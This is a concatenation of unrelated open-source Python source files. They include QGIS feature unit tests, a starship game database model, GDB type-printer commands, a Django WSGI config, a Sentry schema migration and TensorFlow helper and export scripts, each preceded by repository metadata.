start_app()
class TestQgsFeature(unittest.TestCase):
def test_CreateFeature(self):
feat = QgsFeature()
feat.initAttributes(1)
feat.setAttribute(0, "text")
feat.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(123, 456)))
myId = feat.id()
myExpectedId = 0
myMessage = '\nExpected: %s\nGot: %s' % (myExpectedId, myId)
assert myId == myExpectedId, myMessage
def test_ValidFeature(self):
myPath = os.path.join(unitTestDataPath(), 'points.shp')
myLayer = QgsVectorLayer(myPath, 'Points', 'ogr')
provider = myLayer.dataProvider()
fit = provider.getFeatures()
feat = QgsFeature()
fit.nextFeature(feat)
fit.close()
myValidValue = feat.isValid()
myMessage = '\nExpected: %s\nGot: %s' % ("True", myValidValue)
assert myValidValue, myMessage
def test_Validity(self):
f = QgsFeature()
self.assertFalse(f.isValid())
f.setGeometry(QgsGeometry())
self.assertTrue(f.isValid())
f.setValid(False)
self.assertFalse(f.isValid())
fields = QgsFields()
field1 = QgsField('my_field')
fields.append(field1)
field2 = QgsField('my_field2')
fields.append(field2)
f.setFields(fields)
f.setAttribute(0, 0)
self.assertTrue(f.isValid())
f.setValid(False)
self.assertFalse(f.isValid())
f.setId(27)
self.assertTrue(f.isValid())
def test_Attributes(self):
myPath = os.path.join(unitTestDataPath(), 'lines.shp')
myLayer = QgsVectorLayer(myPath, 'Lines', 'ogr')
provider = myLayer.dataProvider()
fit = provider.getFeatures()
feat = QgsFeature()
fit.nextFeature(feat)
fit.close()
myAttributes = feat.attributes()
myExpectedAttributes = ["Highway", 1]
# Only for printing purposes
myExpectedAttributes = ["Highway", 1]
myMessage = '\nExpected: %s\nGot: %s' % (
myExpectedAttributes,
myAttributes
)
assert myAttributes == myExpectedAttributes, myMessage
def test_SetAttributes(self):
feat = QgsFeature()
feat.initAttributes(1)
feat.setAttributes([0])
feat.setAttributes([NULL])
assert [NULL] == feat.attributes()
def test_setAttribute(self):
feat = QgsFeature()
feat.initAttributes(1)
with self.assertRaises(KeyError):
feat.setAttribute(-1, 5)
with self.assertRaises(KeyError):
feat.setAttribute(10, 5)
self.assertTrue(feat.setAttribute(0, 5))
def test_DeleteAttribute(self):
feat = QgsFeature()
feat.initAttributes(3)
feat[0] = "text1"
feat[1] = "text2"
feat[2] = "text3"
feat.deleteAttribute(1)
myAttrs = [feat[0], feat[1]]
myExpectedAttrs = ["text1", "text3"]
myMessage = '\nExpected: %s\nGot: %s' % (str(myExpectedAttrs), str(myAttrs))
assert myAttrs == myExpectedAttrs, myMessage
def test_DeleteAttributeByName(self):
fields = QgsFields()
field1 = QgsField('my_field')
fields.append(field1)
field2 = QgsField('my_field2')
fields.append(field2)
feat = QgsFeature(fields)
feat.initAttributes(2)
feat[0] = "text1"
feat[1] = "text2"
with self.assertRaises(KeyError):
feat.deleteAttribute('not present')
self.assertTrue(feat.deleteAttribute('my_field'))
self.assertEqual(feat.attributes(), ['text2'])
def test_SetGeometry(self):
feat = QgsFeature()
feat.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(123, 456)))
myGeometry = feat.geometry()
myExpectedGeometry = "!None"
myMessage = '\nExpected: %s\nGot: %s' % (myExpectedGeometry, myGeometry)
assert myGeometry is not None, myMessage
# set from QgsAbstractGeometry
feat.setGeometry(QgsPoint(12, 34))
self.assertEqual(feat.geometry().asWkt(), 'Point (12 34)')
if __name__ == '__main__':
unittest.main()
|
chrisnorman7/game
|
refs/heads/master
|
db/starships.py
|
1
|
"""Provides classes related to starships."""
from datetime import timedelta
from sqlalchemy import Column, Float, String
from attrs_sqlalchemy import attrs_sqlalchemy
from .base import Base, ComponentMixin
from util import percent
from distance import m, ly
message_length = 150
@attrs_sqlalchemy
class WormholeDrive(Base, ComponentMixin):
"""
A wormhole drive.
distance is the maximum length of a wormhole created by this unit.
power is how many units of energy are needed by this unit to keep a
wormhole stable. (subtracted per second)."""
__tablename__ = 'wormhole_drives'
distance = Column(Float, nullable=False, default=2.5 * ly)
power = Column(Float, nullable=False, default=500.0)
@attrs_sqlalchemy
class StarshipDrive(Base, ComponentMixin):
"""
A starship drive.
power is multiplied by thrust to decide how much energy this unit requires.
max_thrust is the maximum acceleration or deceleration for this drive.
thrust is the current thrust of this drive. If it is a positive number,
then it is considered accelerating. If it is negative, then the ship is
considered to be decelerating. If it is None, then the drive is considered
to be off. In the case that it is not None, it is considered a fraction of
max_thrust and should be no greater than 1.0, and no less than -1.0.
"""
__tablename__ = 'starship_drives'
power = Column(Float, nullable=False, default=5.0)
max_thrust = Column(Float, nullable=False, default=100 * m)
thrust = Column(Float, nullable=True)
start_msg = Column(
String(message_length),
nullable=False,
default='You become aware of an increase in background noise as the '
'main drive activates.'
)
stop_msg = Column(
String(message_length),
nullable=False,
default='The sound of the main drive fades to silence.'
)
accelerate_msg = Column(
String(message_length),
nullable=False,
default='You notice the effects of acceleration.'
)
decelerate_msg = Column(
String(message_length),
nullable=False,
default='You notice the effects of deceleration.'
)
change_direction_msg = Column(
String(message_length),
nullable=False,
default='Gravity shifts slightly then returns to normal.'
)
def get_thrust(self):
"""Return the thrust of this drive based on self.thrust and
self.hp. This number should be considered a full thrust value, not a
fraction."""
return (
(self.thrust or 1.0) / (
percent(
self.hp,
self.max_hitpoints
) / 100.0
)
) * self.max_thrust
def start(self, thrust):
"""Start this drive working with the specified thrust."""
self.thrust = thrust
self.save()
self.vehicle.announce_all(self.start_msg)
def stop(self):
"""Stop this drive."""
self.thrust = None
self.save()
self.vehicle.announce_all(self.stop_msg)
def time_to_decelerate(self):
"""Returns a timedelta representing how long it will take this drive to
decelerate its host ship to a full stop."""
return timedelta(seconds=self.vehicle.speed / abs(self.get_thrust()))
def distance_to_decelerate(self):
"""Returns the distance (in units) it will take this drive to
decelerate to a full stop. If the drive is not thrusting, a full
deceleration is assumed."""
# Use abs to prevent infinite loops.
thrust = abs(self.get_thrust() or -1.0)
speed = self.vehicle.speed
distance = 0.0
while speed > 0.0:
distance += speed
speed -= thrust
return distance
|
tulir/maubot
|
refs/heads/master
|
maubot/cli/cliq/__init__.py
|
1
|
from .cliq import command, option
from .validators import SPDXValidator, VersionValidator, PathValidator
|
cupertinomiranda/binutils_new
|
refs/heads/tls_dev
|
gdb/python/lib/gdb/command/type_printers.py
|
40
|
# Type printer commands.
# Copyright (C) 2010-2015 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import copy
import gdb
"""GDB commands for working with type-printers."""
class InfoTypePrinter(gdb.Command):
"""GDB command to list all registered type-printers.
Usage: info type-printers
"""
def __init__ (self):
super(InfoTypePrinter, self).__init__("info type-printers",
gdb.COMMAND_DATA)
def list_type_printers(self, type_printers):
"""Print a list of type printers."""
# A potential enhancement is to provide an option to list printers in
# "lookup order" (i.e. unsorted).
sorted_type_printers = sorted (copy.copy(type_printers),
key = lambda x: x.name)
for printer in sorted_type_printers:
if printer.enabled:
enabled = ''
else:
enabled = " [disabled]"
print (" %s%s" % (printer.name, enabled))
def invoke(self, arg, from_tty):
"""GDB calls this to perform the command."""
sep = ''
for objfile in gdb.objfiles():
if objfile.type_printers:
print ("%sType printers for %s:" % (sep, objfile.filename))
self.list_type_printers(objfile.type_printers)
sep = '\n'
if gdb.current_progspace().type_printers:
print ("%sType printers for program space:" % sep)
self.list_type_printers(gdb.current_progspace().type_printers)
sep = '\n'
if gdb.type_printers:
print ("%sGlobal type printers:" % sep)
self.list_type_printers(gdb.type_printers)
class _EnableOrDisableCommand(gdb.Command):
def __init__(self, setting, name):
super(_EnableOrDisableCommand, self).__init__(name, gdb.COMMAND_DATA)
self.setting = setting
def set_some(self, name, printers):
result = False
for p in printers:
if name == p.name:
p.enabled = self.setting
result = True
return result
def invoke(self, arg, from_tty):
"""GDB calls this to perform the command."""
for name in arg.split():
ok = False
for objfile in gdb.objfiles():
if self.set_some(name, objfile.type_printers):
ok = True
if self.set_some(name, gdb.current_progspace().type_printers):
ok = True
if self.set_some(name, gdb.type_printers):
ok = True
if not ok:
print ("No type printer named '%s'" % name)
def add_some(self, result, word, printers):
for p in printers:
if p.name.startswith(word):
result.append(p.name)
def complete(self, text, word):
result = []
for objfile in gdb.objfiles():
self.add_some(result, word, objfile.type_printers)
self.add_some(result, word, gdb.current_progspace().type_printers)
self.add_some(result, word, gdb.type_printers)
return result
class EnableTypePrinter(_EnableOrDisableCommand):
"""GDB command to enable the specified type printer.
Usage: enable type-printer NAME
NAME is the name of the type-printer.
"""
def __init__(self):
super(EnableTypePrinter, self).__init__(True, "enable type-printer")
class DisableTypePrinter(_EnableOrDisableCommand):
"""GDB command to disable the specified type-printer.
Usage: disable type-printer NAME
NAME is the name of the type-printer.
"""
def __init__(self):
super(DisableTypePrinter, self).__init__(False, "disable type-printer")
InfoTypePrinter()
EnableTypePrinter()
DisableTypePrinter()
|
orymeyer/Flask-Python-GAE-Login-Registration
|
refs/heads/master
|
lib/Werkzeug-0.10.4.dist-info/flask/testsuite/test_apps/config_package_app/__init__.py
|
1257
|
import os
import flask
here = os.path.abspath(os.path.dirname(__file__))
app = flask.Flask(__name__)
|
lunixbochs/fs-uae-gles
|
refs/heads/master
|
launcher/fs_uae_launcher/fsui/wx/image.py
|
1
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import wx
import pkg_resources
class Image:
def __init__(self, name):
package, file = name.split(":", 1)
stream = pkg_resources.resource_stream(package, file)
image = wx.ImageFromStream(stream)
self.bitmap = wx.BitmapFromImage(image)
|
tiankangkan/paper_plane
|
refs/heads/master
|
paper_plane/wsgi.py
|
1
|
"""
WSGI config for test_of_lin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
import sys
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "paper_plane.settings")
os.environ.setdefault("PYTHON_EGG_CACHE", "/tmp/.python-eggs")
project = os.path.dirname(os.path.dirname(__file__))
sys.path.insert(0, project)
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
apark263/tensorflow
|
refs/heads/master
|
tensorflow/contrib/constrained_optimization/python/test_util.py
|
39
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains helpers used by tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.constrained_optimization.python import constrained_minimization_problem
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import standard_ops
class ConstantMinimizationProblem(
constrained_minimization_problem.ConstrainedMinimizationProblem):
"""A `ConstrainedMinimizationProblem` with constant constraint violations.
This minimization problem is intended for use in performing simple tests of
the Lagrange multiplier (or equivalent) update in the optimizers. There is a
one-element "dummy" model parameter, but it should be ignored.
"""
def __init__(self, constraints):
"""Constructs a new `ConstantMinimizationProblem'.
Args:
constraints: 1d numpy array, the constant constraint violations.
Returns:
A new `ConstantMinimizationProblem'.
"""
# We make an fake 1-parameter linear objective so that we don't get a "no
# variables to optimize" error.
self._objective = standard_ops.Variable(0.0, dtype=dtypes.float32)
self._constraints = standard_ops.constant(constraints, dtype=dtypes.float32)
@property
def objective(self):
"""Returns the objective function."""
return self._objective
@property
def constraints(self):
"""Returns the constant constraint violations."""
return self._constraints
|
SilentCircle/sentry
|
refs/heads/master
|
src/sentry/migrations/0063_auto.py
|
4
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'MessageCountByMinute', fields ['date']
db.create_index('sentry_messagecountbyminute', ['date'])
def backwards(self, orm):
# Removing index on 'MessageCountByMinute', fields ['date']
db.delete_index('sentry_messagecountbyminute', ['date'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filterkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'FilterKey'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['auth.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Team']", 'null': 'True'})
},
'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.team': {
'Meta': {'object_name': 'Team'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': "orm['auth.User']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
|
addappio/serving
|
refs/heads/develop
|
tensorflow_serving/servables/tensorflow/testdata/export_bad_half_plus_two.py
|
3
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Exports a toy TensorFlow model without signatures.
Exports half_plus_two TensorFlow model to /tmp/bad_half_plus_two/ without
signatures. This is used to test the fault-tolerance of tensorflow_model_server.
"""
import os
# This is a placeholder for a Google-internal import.
import tensorflow as tf
def Export():
export_path = "/tmp/bad_half_plus_two/00000123"
with tf.Session() as sess:
# Make model parameters a&b variables instead of constants to
# exercise the variable reloading mechanisms.
a = tf.Variable(0.5)
b = tf.Variable(2.0)
# Calculate, y = a*x + b
# here we use a placeholder 'x' which is fed at inference time.
x = tf.placeholder(tf.float32)
y = tf.add(tf.multiply(a, x), b)
# Export the model without signatures.
# Note that the model is intentionally exported without using exporter,
# but using the same format. This is to avoid exporter creating default
# empty signatures upon export.
tf.global_variables_initializer().run()
saver = tf.train.Saver()
saver.export_meta_graph(
filename=os.path.join(export_path, "export.meta"))
saver.save(sess,
os.path.join(export_path, "export"),
write_meta_graph=False)
def main(_):
Export()
if __name__ == "__main__":
tf.app.run()
|
evidation-health/bokeh
|
refs/heads/master
|
examples/charts/file/dots.py
|
6
|
from collections import OrderedDict
